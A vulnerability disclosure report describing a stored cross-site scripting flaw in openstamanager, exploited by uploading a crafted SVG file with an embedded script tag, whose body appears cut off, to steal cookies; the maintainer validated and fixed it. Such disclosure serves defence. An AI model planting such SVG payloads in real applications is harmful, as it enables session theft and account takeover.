Cross-site Scripting (XSS) - Stored in devcode-it/openstamanager


Reported on

Jul 2nd 2021

✍️ Description

Stored xss through file upload via anagrafiche

🕵️‍♂️ Proof of Concept

Go to an existing Anagrafiche or create a new one. Upload a .svg file with the following content:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" ""><svg version="1.1" baseProfile="full" xmlns="">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">

give a name you want ending with .svg (store-xss.svg) for example. alt text when you click on the uploaded image a new window will open which pops up an xss with the cookie in it. alt text

💥 Impact

Possible to steal admin cookies or take over another account via cookie grepping.

💥 Remediation

Sanitize user input.

💥 References

We have contacted a member of the devcode-it/openstamanager team and are waiting to hear back 5 months ago
devcode-it/openstamanager maintainer validated this vulnerability 5 months ago
ribersec has been awarded the disclosure bounty
The fix bounty is now up for grabs
devcode-it/openstamanager maintainer confirmed that a fix has been merged on 7ec0bb 5 months ago
The fix bounty has been dropped
devcode-it/openstamanager maintainer
5 months ago

How can we contact you for bounty?

5 months ago

Researcher platform handles the bounty.

devcode-it/openstamanager maintainer
5 months ago

Ok! Many thanks! :-D